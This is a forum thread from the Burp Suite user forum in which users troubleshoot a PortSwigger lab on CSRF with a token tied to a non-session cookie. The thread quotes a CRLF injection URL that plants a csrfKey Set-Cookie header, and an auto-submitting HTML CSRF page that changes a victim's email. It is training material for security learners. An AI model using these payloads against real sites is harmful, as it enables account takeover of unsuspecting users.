Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: CSRF where token is tied to non-session cookie solution not working due

Andre | Last updated: May 09, 2023 06:32PM UTC

Hi, i have an issue getting the solution to the lab working. Whenever i try to set the value of the csrf token with /?search=test%0d%0aSet-Cookie:%20csrfKey=8TIB6mcBo8vOoLZ1nSPocJae9QLOWMAw%3b%20SameSite=None the cookie remains unchanged afterwards. Other ways of changing the csrf cookie like javascript document.cookie="csrf=8TIB6mcBo8vOoLZ1nSPocJae9QLOWMAw;"; share the same problem and leave the cookie unchanged. I did get a positive response when manually setting the csrf token and cookie in the repeater function of burp suite so the exploit seems to be working fine, but as my csrf cookie remains unchanged i cant replicate this result within the exloit server.

Ben, PortSwigger Agent | Last updated: May 10, 2023 07:33AM UTC

Hi Andre, Are you able to provide screenshots of what you CSRF PoC looks like and what you are, ultimately, entering into the Exploit Server to deliver to the victim so that we can take a look at this for you?

Collin | Last updated: Apr 18, 2024 12:24AM UTC

Hey! I am having the same exact issue. Here is a copy: <html> <head> <title>Change Email Form</title> </head> <body> <form id="change-email-form" action="https://0a0200c203c037d480772181007c006f.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="pwned10@evil-user.net" /> <input type="hidden" name="csrf" value="yqItjmQ8JxEqx4Hg0Z5OhT9ETtG9MDRC" /> </form> <img src="https://0a0200c203c037d480772181007c006f.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=PCm78GJGIkdyuWHEEFK4ZXH4kzlxRR9f" onerror="document.forms[0].submit()"></img> </body> </html> I see clearly a http response from the server that has the Set-Cookie and is correct, but the cookie is not changed/set in the next response.

Ben, PortSwigger Agent | Last updated: Apr 18, 2024 08:29AM UTC

Hi Collin, If you add 'SameSite=None' do your exploit, does this allow you to successfully deliver the exploit to the victim and solve the lab? i.e.: <img src="https://0a0200c203c037d480772181007c006f.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey= PCm78GJGIkdyuWHEEFK4ZXH4kzlxRR9f%3b%20SameSite=None" onerror="document.forms[0].submit()"></img>

Collin | Last updated: Apr 18, 2024 11:38PM UTC